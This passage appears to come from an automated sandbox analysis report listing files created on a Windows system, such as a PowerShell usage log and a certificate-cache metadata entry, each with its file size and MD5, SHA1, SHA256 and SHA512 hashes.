SHA512136ef7cc91e222e9aecc45d02937c282d415d5283f3a623c9df414d8000f002b4e472df03aec1bebdff196ceb068586a94edeb1109f0f1cc0b92bb5caf7d1e36
-
Filesize
298B
MD5e9b3fc35d83a8ccd63029231ffacd8c1
SHA1f7ef1e3ca8141a0b75a7448b8c81b34d24313fe4
SHA2565cb4af357d6ce0ed884623d3d63c6423991a3a36370c55f5e907493a6ece2e2c
SHA512156c3790c0b974dad7e71744a1b2791b71eb3eaa65a918bf8638f224901f6f284f71b4dbfcad3f301cc54cd7e19dd8cc8be0b0cb7730072a46c1e318f133964d
-
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
Filesize330B
MD51f38071af8f82c42da0561cd3755724c
SHA1a8d0fc97498dd8f78c6078562ba6650a47289d86
SHA2568d91b78508805716ea2ef3d2536088f47ef911da8b016371f527b14cbfd64756
SHA512babff509f025d399a8664ee4819271df2fdf93b4c9c63c1377bae7cc221ec49f672036f6249c5c924c6a227bbf54a9b9c3dd154d0b866babb3a36f70ab6db777
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
Filesize3KB
MD56db666b8eea8c87bb44fc342dbda5fcb
SHA12536fb957e13fd2144e482970707286ca2625816
SHA256079b31aa6c5078c9a97ffc9cfd2778942fbb12359b05975eb18507b6a1f18438
SHA51288fcd3e8aaefc443b3fac3ec5a55762424a9d2211b051a36daad0c6be63f7a3f6f51d4be4e89189be044c7df6bcbded7eab6d3cba07a7a1458c48604b365579e
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5a4fe0be11fb007b21a2fafa6abe0bf6f
SHA1d0f2c0a5c7ee3491272101c3aaf7998bbb2fd22a
SHA256ec0577e1bf334d310a1a70fd57fd1e561a90bbdd34737daed674f01c36c0c8d2
SHA5121c51108e19f5a97acb7bba7c996c26a2715e3a4bb04b79c9afd718f8b8822bf906123e42eb1e40c88206bbce86b43546644d88794cc0de26126a38d9e27e01c0